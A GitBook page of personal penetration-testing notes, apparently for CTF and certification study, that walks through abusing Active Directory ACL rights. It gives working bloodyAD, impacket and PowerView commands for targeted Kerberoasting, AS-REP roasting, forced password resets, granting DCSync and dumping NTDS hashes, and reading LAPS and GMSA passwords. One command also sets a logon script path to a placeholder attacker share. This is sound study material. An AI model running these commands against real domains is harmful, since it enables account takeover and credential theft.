Pentest Notes
  • 🏠/home/x3m1Sec/.pt-notes
  • 📝Pentest Notes
    • 🔍Information Gathering
    • 📜Protocols and Services
      • DNS Port (53)
      • FTP Port (21)
      • IMAP Ports (143,993)
      • IPMI Port (623)
      • Kerberos Port (88)
      • MSSQL Port (1433)
      • MySQL Port (3306)
      • NFS Ports (111,2049)
      • NetBIOS Ports (137,138,139)
      • Oracle TNS Port (1521)
      • POP3 Port (110)
      • PostgreSQL Port (5432)
      • RDP Port (3389)
      • SMB Ports (139,445)
      • SMTP Port (25)
      • SNMP Ports (161,162)
      • Java RMI Port (1099)
      • LDAP Ports (389,636)
      • Apache Tomcat Ports (8080,8180)
      • Port 123 - NTP
      • RPCBind Ports (111,32771)
      • Email Services
      • Nmap Commands for Port Discovery
    • 🕸️Web Applications
      • Web Attacks
        • Cross Site Scripting (XSS)
        • SQL Injection (SQLi)
        • File Upload Vulnerabilities
        • Insecure Direct Object References (IDOR)
        • OS Command Injection
        • Local File Inclusion (LFI)
        • Remote File Inclusion (RFI)
        • XML External Entities (XXE)
        • HTTP Verb Tampering
        • Sub-domain Enumeration
      • Web Technologies
        • Tomcat
        • CGI Applications
        • WordPress
        • SAP Netweaver
        • Joomla
        • Drupal
        • Gitlab
        • Jenkins
        • Microsoft IIS
        • osTicket
        • PRTG Network Monitor
        • Splunk
      • Fuzzing
    • 🪟Active Directory Pentesting
      • 🔍Initial Enumeration
        • 👤Enumerating Users
      • 🛠️Abusing ACLs/ACEs
      • 🏛️Active Directory Certificate Services (ADCS)
      • 🎭Attacking Kerberos
      • 🐶Bloodhound
      • 🧰Tools
        • 🩸BloodyAD
        • 📦Impacket
        • 🦁Kerbrute
        • 📚LDAPSearch
        • 🧠PowerView.py
    • 🐧Linux Privilege Escalation
      • Linux PrivEsc Summary
      • PriveEsc Checklist
      • Enumerating Attack Vectors
      • Privileged Groups
      • Environment Variables Abuse
      • Capabilities Abuse
      • Programs, Jobs and Services
      • Miscellaneous Techniques
      • Recent CVEs
    • 🪟Windows Privilege Escalation
      • PriveEsc checklist
      • Enumerating Attack Vectors
      • Excessive User Rights Abuse
      • Built-in Groups Abuse
      • File System ACLs
      • Services Hijacking
      • User Account Control (UAC) Bypass
      • Living off the Land
    • 🐛Bug Bounty Hunting
      • Bug Bounty Tools
    • 👾Utilities, Scripts and Payloads
      • Shells and Payloads
      • Metasploit Framework
      • File Transfers
      • Pivoting, Tunneling, Port Forwarding
      • Password Attacks
      • Spawn TTY Shells
  • 🎮CTFs
    • 🟩Hack The Box
      • Linux
        • Easy Level
          • Busqueda
          • Help
          • Sau
          • Broker
          • Sea
          • Nibbles
          • Codify
          • Cozyhosting
          • Devvortex
          • Irked
          • Keeper
          • Knife
          • Pilgrimage
          • Soccer
          • Sunday
          • Tabby
          • Usage
          • Bashed
          • Analytics
          • Networked
          • Swagshop
          • Pandora
          • OpenAdmin
          • Precious
          • Boardlight
          • Editorial
        • Medium Level
          • Monitored
          • Updown
          • Popcorn
          • Jarvis
          • Mentor
          • Poison
          • Solidstate
          • Tartarsauce
          • Nineveh
          • Magic
          • Builder
        • Hard Level
    • 🔴TryHackMe
  • 🎓Road to certification
    • eJPTv2
      • My review
    • CPTS
      • Enumeration
        • Enum Cheklist
        • Initial Enumeration
      • Nmap
        • Nmap Full Flag
        • Protocol Scan
        • Scan-network-with-nmap
      • Attacking Common Applications
        • 1.Content Management Systems (CMS)
          • 1.-Wordpress-discovery-and-enumeration
          • 2.-Attacking-wordpress
          • 3.-Joomla-discovery-and-enumeration
          • 4.-Attacking-joomla
          • 5.-Drupal-discovery-and-enumeration
          • 6.-Attacking-drupal
        • 2. Servlet Containers and Software Development
          • 10.-Attacking-jenkins
          • 7.-Tomcat-discovery-and-enumeration
          • 8.-Attacking-tomcat
          • Attacking Jenkins - Focused Commands & Key Points
        • 3. Infrastructure and Network Monitoring Tools
          • 11.-Aplunk-discovery-and-enumeration
          • 12.-Attacking-splunk
          • 13.Prtg-network-monitor
        • 4. Customer Service Mgmt & Configuration Management
          • 14.-Osticket
          • 15.Gitlab-discovery-and-enumeration
          • 16.-Attacking-gitlab
        • 5. Common Gateway Interfaces
          • 17.-Attacking-tomcat-cgi
          • 18.-Attacking-cgi-applications-shellshock
        • 6. Thick Client Applications
          • 19.-Attacking-thick-client-applications
          • 20.Exploiting-web-vulnerabilities-in-thick-client-applications
        • 7. Miscellaneous Applications
          • 21.-Coldfusion-discovery-and-enumeration
          • ColdFusion Exploitation Guide
          • 23.-IIS-tilde-enumeration
          • 24.Attacking-ldap
          • 25.-Web-mass-assignment-vulnerabilities
          • 26.Attacking-applications-connecting-to-services
          • 27.Other-notable-applications
        • 8. Closing Out
          • 28.Application-hardening
      • Attacking Common Services
        • 1.Protocol-specific-attacks
        • 2.FTP
        • 3.SMB
        • 4.SQL-databases
        • 5.RDP
        • 6.DNS
        • 7.SMTP
      • Active Directory Enumeration & Attacks
        • 0. AD Pentest
          • Quick Guide To AD Pentesting
          • Active Directory: Full Attack Name
          • Active Directory Advanced Concepts
          • Active Directory Delegation
          • Beyond-Active-Directory
        • 1.Initial Enumeration
          • 1.External Recon and Enumeration Principles
          • 1.initial-enumeration-of-the-domain
          • Active-Directory-Basic-Command
        • 2.Sniffing out a Foothold
          • 3. LLMNR-NBT-NS Poisoning - from Linux
          • 4.LLMNR-NBT-NS Poisoning - from Windows
        • 3.Sighting In, Hunting For A User
          • 5.Password Spraying Overview
          • 6.Enumerating & Retrieving Password Policies
          • 7.Password Spraying - Making a Target User List
        • 4.Spray Responsibly
          • 8. Internal Password Spraying - from Linux
          • 9.Internal Password Spraying - from Windows
        • 5.Deeper Down the Rabbit Hole
          • 10. Enumerating Security Controls
          • 11. Credentialed Enumeration - from Linux
          • 12.Credentialed Enumeration - from Windows
          • 13. Living Off the Land
        • 6.Cooking with Fire
          • 14.Kerberoasting - from Linux
          • 15. Kerberoasting - from Windows
          • Kerberoasting Attack Step by Step Guide
          • Kerberoasting Attack Step by Step Guide
        • 7.An ACE in the Hole
          • 16.Access Control List (ACL) Abuse Primer
          • 17. ACL Enumeration
          • 18. ACL Abuse Tactics
          • 19. DCSync
        • 8.Stacking The Deck
          • 20.Privileged Access
          • 21.Kerberos Double Hop Problem
          • 22.Bleeding Edge Vulnerabilities
          • 23.Miscellaneous Misconfigurations
        • 9.Why So Trusting
          • 24.Domain Trusts Primer
          • 25.Attacking Domain Trusts - Child - Parent Trusts - from Windows
          • 26. Attacking Domain Trusts - Child - Parent Trusts - from Linux
        • 10.Breaking Down Boundaries
          • 27.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows
          • 28.Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux
        • 11.Defensive Considerations
          • 29.Hardening-active-directory
          • 30.Additional AD Auditing Techniques
      • Linux Privilege Escalation
        • Linux-hardening
        • Linux-priv-esc-to-quick-check-the-system
        • 1.Information Gathering
          • 1.Environment-enumeration
          • 2.Linux-services-and-internals-enumeration
          • 3.Credential-hunting
        • 2.Environment-based Privilege Escalation
          • 4.Path-abuse
          • 5.Wildcard-abuse
          • 6.Escaping-restricted-shells
        • 3.Permissions-based Privilege Escalation
          • 10.Capabilities
          • 7.-Special-permissions
          • 8.Sudo-rights-abuse
          • 9.Privileged-groups
        • 4.Service-based Privilege Escalation
          • 11.Vulnerable-services
          • 12.Cron-job-abuse
          • LXC Privilege Escalation Techniques
          • 14.-Docker
          • 15.Kubernetes
          • 16.Logrotate
          • 17.Miscellaneous-techniques
        • 5.Linux Internals-based Privilege Escalation
          • 18.Kernel-exploits
          • 19.Shared-libraries
          • 20.Shared-object-hijacking
          • 21.Python-library-hijacking
        • 6.Recent 0-Days
          • 22.Sudo
          • 23.Polkit
          • 24.Dirty-pipe
          • 25.Netfilter
      • Windows Privilege Escalation
        • Priv-Esc
        • 1.Getting the Lay of the Land
          • 1.Situational-awareness
          • 2.Initial-enumeration
          • 3.Communication-with-processes
        • 2.Windows User Privileges
          • 4.windows-privileges-overview
          • 5.Seimpersonate-and-seassignprimarytoken
          • 6.Sedebugprivilege
          • Exploiting SeTakeOwnershipPrivilege
        • 3.Windows Group Privileges
          • 10.DNSadmins
          • 11.Hyper-v-administrators
          • Key Concepts:
          • Key Concepts:
          • 8.Windows-built-in-groups
          • Exploiting Event Log Readers Group for Security Log Access
        • 4.Attacking the OS
          • 14.User-account-control
          • 15.Weak-permissions
          • 16.Kernel-exploits
          • 17.Vulnerable-services
          • 18.DLL-injection
        • 5.Credential Theft
          • 19.Credential-hunting
          • 20.Other-files
          • 21.Further-credential-theft
        • 6.Restricted Environments
          • 22.-Citrix-breakout
        • 7.Additional Techniques
          • 23.Interacting-with-users
          • 24.Pillaging
          • 25.Miscellaneous-techniques
        • 8.Dealing with End of Life Systems
          • Key Points:
          • 27.windows-server
          • 28.windows-desktop-versions
      • Server-side Attacks
        • Server-side-vulnerabilities
      • Web Attacks
        • 1.-HTTP-verb-tampering
        • 2.-Insecure-direct-object-references-idor
        • 3.-XML-external-entity-xxe-injection
        • Web-attacks-to-the-point
      • Web Service & API Attacks
        • web-service-and-api-attacks
      • Command-injections
      • SQL-injection
      • XSS
        • XSS-based Session Hijacking
      • Broken Authentication
      • Login-brute-forcing
      • Password-attacks
      • Password-cracking
      • Session Security Guide
      • File-transfer
      • File-upload-attacks
      • Shells and payloads
      • Upgrading-tty-shell
      • Using-the-metasploit-framework
      • File Inclusion
        • 1.File Disclosure
          • 1.Local-file-inclusion-lfi
          • 2.Basic-bypasses
          • 3.PHP-filters
        • 2.Remote Code Execution
          • 4.PHP-wrappers
          • 5.Remote-file-inclusion-rfi
          • 6.LFI-and-file-uploads
          • 7.LOG-poisoning
        • 3.Automation and Prevention
          • 8.Automated-scanning
          • 9.File-inclusion-prevention
      • Ligolo-ng
      • Pivoting-tunneling-and-port-forwarding
      • TIPS
      • CheatSheet
    • OSCP
      • Preparation
      • Cheatsheets
      • Machine List
  • 📚Resources
    • Cheat Sheets
      • Default Passwords
      • Kerberoast
      • Mimikatz
      • Powerup
    • Hashcat Word lists and Rules
    • Metasploit Modules
    • Misc Snippets
    • GTFOBins
    • LOLBAS
    • WADCOMS
    • Reverse Shell Generator
    • Pentestmonkey Revshell
    • OSINT Tools
    • Weakpass
Powered by GitBook
On this page
  • GenericAll/GenericWrite
  • User/Computer
  • AS-REP Roast Attack
  • Password Modification
  • Script Path Manipulation
  • Group Manipulation
  • Linux
  • Windows
  • WriteDACL
  • WriteDACL on Domain
  • WriteDACL on Group
  • WriteOwner
  • Linux
  • Windows
  • ReadLAPSPassword
  • Linux
  • Windows
  • ReadGMSAPassword
  • Linux
  • ForceChangePassword
  • Linux
  • Windows
  • Organizational Units ACL
  • Non-Privileged Objects
  1. Pentest Notes
  2. Active Directory Pentesting

Abusing ACLs/ACEs

GenericAll/GenericWrite

User/Computer

We can configure a fake SPN on a target account, request a service ticket (TGS), then obtain its hash and perform a Kerberoasting Attack.

Requirements: Having GenericAll or GenericWrite permissions

Linux

# Assign a fake SPN (cifs/gzzcoo) to the account called 'target'.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName -v 'cifs/gzzcoo'

# Get the TGS ticket of the user we made Kerberoastable.
impacket-GetUserSPNs -dc-ip 10.10.10.10 domain.htb/'user':'password' -request-user 'target'

# Leave the SPN empty on the user we had made Kerberoastable.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'target' servicePrincipalName

Alternative with PowerView.py:

# Through PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'

# Automatic process, assigns an SPN to users with permissions, gives you the TGS ticket and then leaves the user as it was.
python3 targetedKerberoast.py --dc-ip 10.10.10.10 -d domain.htb -u 'user' -p 'password'

Windows

# Make sure the victim user doesn't have an SPN
Get-DomainUser 'victimuser' | Select serviceprincipalname

# Configure the SPN for the victim user
Set-DomainObject -Identity 'victimuser' -Set @{serviceprincipalname='cifs/gzzcoo'}

# Get the Kerberoast hash
$User = Get-DomainUser 'victimuser'
$User | Get-DomainSPNTicket | fl

# Remove the SPN from the victim user to leave it as it was
$User | Select serviceprincipalname
Set-DomainObject -Identity 'victimuser' -Clear serviceprincipalname

AS-REP Roast Attack

We can assign a user the flag (DONT_REQ_PREAUTH), request a ticket (TGT), then obtain a hash and perform AS-REP Roast.

Requirements: Having GenericAll or GenericWrite permissions

Linux

# Assign the user 'target' the flag (DONT_REQ_PREAUTH)
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add uac 'TARGET' -f DONT_REQ_PREAUTH

# Request the TGT ticket of the AS-REP Roastable user
impacket-GetNPUsers domain.htb/target -no-pass 2>/dev/null

# Return the AS-REP Roastable user to normal
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove uac 'TARGET' -f DONT_REQ_PREAUTH

Alternative with PowerView.py:

# From PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'

Windows

# REQUIRED TO IMPORT PowerView.ps1 AND ASREPRoast.ps1 ON THE VICTIM WINDOWS MACHINE

# Modify the userAccountControl (UAC) of the user to make it AS-REP Roastable
Get-DomainUser username | ConvertFrom-UACValue

# Request the TGT ticket
Get-DomainUser username | ConvertFrom-UACValue
Get-ASREPHash -Domain domain.htb -UserName username

# Set the user's UAC to default
Set-DomainObject -Identity username -XOR @{useraccountcontrol=4194304} -Verbose
Get-DomainUser username | ConvertFrom-UACValue

Password Modification

Modify another user's password.

Requirements: Having GenericAll permissions

Linux

# Modify the password of user 'USER_TARGET' to 'Password01!' with bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with rpcclient
rpcclient -U 'user%password' 10.10.10.10 -W <DOMAIN> -c 'setuserinfo2 <user_target> 23 Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with net rpc
net rpc password "user_target" "Password01!" -U 'domain.htb/user%password' -S 10.10.10.10

# Modify the password of user 'USER_TARGET' to 'Password01!' with PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Verification:

# Verify that the change has been made successfully
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'

Windows

# Having access to a domain machine or DC, we can modify the user's password
net user <user_target> Password01! /domain

# From PowerShell, create an object for our user in case we don't have access with their user to the terminal, and change credentials to the target user
$SecPassword = ConvertTo-SecureString 'Password_Attacker' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\user_attacker',$SecPassword)
$NewPass = ConvertTo-SecureString 'Password01!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'domain.htb\user_target' -AccountPassword = $NewPass -Credential $Cred

Script Path Manipulation

WriteProperty on an ObjectType, which in this particular case is Script-Path, allows the attacker to overwrite the login script path of the delegated user, meaning that the next time the delegated user logs in, their system will execute our malicious script.

Requirements: Having GenericAll or GenericWrite permissions

Linux

# Assign user 'TARGET' a malicious script that will execute when they log in
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set object 'TARGET' scriptpath -v '\\<ATTACKER_IP>\malicious.bat'

Windows

# Assign user 'target' to execute a malicious script located on the same victim machine
Set-DomainObject -Identity 'target' -SET @{scriptpath='C:\ProgramData\test\test.ps1'}

Group Manipulation

Add ourselves to a group or another domain user.

Linux

# We have GenericAll permissions on the group, so we add ourselves to the group
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add groupMember 'Domain Admins' 'user'

# Add user 'UserToAdd' to a group where we have GenericAll permissions
net rpc group ADDMEM 'GROUP TARGET' 'UserToAdd' -U 'user%password' -W domain.htb -I 10.10.10.10

# Add user 'target' to group 'Group_target'
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Add-DomainGroupMember -Identity 'Group_target' -Members 'target'

Windows

net group 'GROUP TARGET' 'USER_TARGET' /add /domain

WriteDACL

This permission allows modifying the Discretionary Access Control List (DACL) of an object, enabling the user to change associated permissions. An attacker with WriteDACL could grant themselves additional privileges or revoke legitimate access, compromising system security.

WriteDACL on Domain

Linux

# Having WriteDACL permissions on the domain, we can give DCSync permissions to any user
bloodyAD  --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add dcsync 'OBJECT_TARGET'

# Once the user has DCSync permissions, we dump the NTDS.dit
impacket-secretsdump domain.htb/'user':'password'@10.10.10.10 -dc-ip 10.10.10.10 -just-dc-ntlm

# Return the victim user to the previous state
bloodyAD  --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove dcsync 'OBJECT_TARGET'

Windows

# Grant DCSync permissions to identity 'user_target'
Import-Module .\PowerView.ps1
$SecPassword = ConvertTo-SecureString 'Password01!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\hacker', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'DC=domain,DC=htb' -Rights DCSync -PrincipalIdentity 'user_target' -Verbose -Domain domain.htb

WriteDACL on Group

Linux

# With WriteDACL on a group, we grant a user full control permissions over the group
bloodyAD  --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add genericAll 'cn=GROUP_TARGET,dc=domain,dc=htb' 'user'

# Remove the genericAll permission to leave it as before
bloodyAD  --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' remove genericAll 'cn=GROUP_TARGET,dc=domain,dc=htb' 'user'

Windows

# Add ourselves to the group with native Windows commands
net group 'GROUP_TARGET' 'user_target' /add /domain
# Through PowerSploit to give ourselves WriteMember permissions on the group
Add-DomainObjectAcl -TargetIdentity 'GROUP_TARGET' -Rights WriteMembers -PrincipalIdentity 'user_target'

WriteOwner

An attacker can become the owner of an object. Once the owner has been modified to one that the attacker has access to, they can manipulate the object having absolute control over it.

Linux

# We become the owner of the object.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set owner 'OBJECT_TARGET' 'USER_TARGET'

# To ensure full control, being owners we grant ourselves genericAll on the object.
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' add genericAll 'OBJECT_TARGET' 'USER_TARGET'

Alternative with PowerView.py:

# Make user 'user_target' the owner of object 'object_target'
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'

Windows

# Required to import PowerView.ps1
$SecPassword = ConvertTo-SecureString 'password' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\hacker', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "object_target" -PrincipalIdentity 'user_target'
Add-DomainObjectAcl -TargetIdentity 'object_target' -Rights WriteMembers -PrincipalIdentity 'user_target'

ReadLAPSPassword

If an attacker has a user with ReadLAPSPassword privileges, they can read the LAPS password of the machine to which this ACL applies.

Linux

# Read LAPS password through bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get search --filter '(ms-mcs-admpwdexpirationtime=*)' --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

# Read LAPS password through nxc
nxc ldap 10.10.10.10 -u 'user' -p 'password' -M laps

# Read LAPS password through LAPSDumper
python3 laps.py -u 'user' -p 'password' -d domain.htb

Windows

# Read LAPS password through PowerShell (native command)
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'

# Read LAPS password through Get-LAPSPasswords.ps1
Get-LAPSPasswords -DomainController 10.10.10.10 -Credential domain.htb\user| Format-Table -AutoSize

ReadGMSAPassword

If an attacker has a user with ReadGMSAPassword privileges, they can read the GMSA password of the machine to which this ACL applies.

Linux

# Read GMSA password through bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' get object 'TARGET' --attr msDS-ManagedPassword

# Read GMSA password through nxc
nxc ldap 10.10.10.10 -u 'user' -p 'password' --gmsa

# Read GMSA password through gMSADumper
python3 gMSADumper.py -u 'user' -p 'password' -d domain.htb

# Read GMSA password through PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Get-GMSA

ForceChangePassword

If a user has the ForceChangePassword ACL on a user, they can modify the target user's password without needing to know their current password.

Linux

# Modify the password of user 'USER_TARGET' to 'Password01!' with bloodyAD
bloodyAD --host 10.10.10.10 -d domain.htb -u 'user' -p 'password' set password 'USER_TARGET' 'Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with rpcclient
rpcclient -U 'user%password' 10.10.10.10 -W <DOMAIN> -c 'setuserinfo2 <user_target> 23 Password01!'

# Modify the password of user 'USER_TARGET' to 'Password01!' with net rpc
net rpc password "user_target" "Password01!" -U 'domain.htb/user%password' -S 10.10.10.10

# Modify the password of user 'USER_TARGET' to 'Password01!' with PowerView.py
powerview domain.htb/'user':'password'@10.10.10.10 --dc-ip 10.10.10.10
PV > Set-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'

Verification:

# Verify that the change has been made successfully
nxc smb 10.10.10.10 -u 'USER_TARGET' -p 'Password01!'

Windows

# Having access to a domain machine or DC, we can modify the user's password
net user <user_target> Password01! /domain
# From PowerShell, create an object for our user in case we don't have access with their user to the terminal, and change credentials to the target user
$SecPassword = ConvertTo-SecureString 'Password_Attacker' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('domain.htb\user_attacker',$SecPassword)
$NewPass = ConvertTo-SecureString 'Password01!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'domain.htb\user_target' -AccountPassword = $NewPass -Credential $Cred

Organizational Units ACL

ACLs on Organizational Units (OUs) can be exploited to compromise all objects contained within them.

Non-Privileged Objects

A user with GenericAll or WriteDACL permissions on an OU can add an ACE with FullControl and inheritance enabled, compromising all child objects by inheriting said ACE.

Linux

# Grant ourselves FullControl over the OU called TESTERS
impacket-dacledit -action 'write' -rights 'FullControl' -inheritance -principal 'username' -target-dn 'ou=testers,dc=domain,dc=htb' 'domain.htb'/'user':'password' -dc-ip 10.10.10.10 2>/dev/null

# Verify that we have FullControl over the OU called TESTERS
impacket-dacledit -action 'read' -principal 'username' -target-dn 'ou=testers,dc=domain,dc=htb' 'domain.htb'/'user':'password' -dc-ip 10.10.10.10 2>/dev/null
PreviousEnumerating UsersNextActive Directory Certificate Services (ADCS)

Last updated 12 days ago

📝
🪟
🛠️